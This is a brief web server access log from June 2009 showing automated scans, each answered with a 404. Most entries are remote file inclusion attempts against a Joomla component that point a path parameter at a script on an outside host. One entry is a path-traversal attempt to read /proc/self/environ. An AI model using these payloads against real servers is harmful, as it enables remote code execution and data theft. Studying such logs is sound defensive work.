216.17.99.13 - - [21/Jun/2009:08:49:57 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
200.234.201.114 - - [21/Jun/2009:08:49:58 -0400] "GET /logs/admin/classes/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
216.17.99.13 - - [21/Jun/2009:08:50:05 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [21/Jun/2009:08:50:05 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
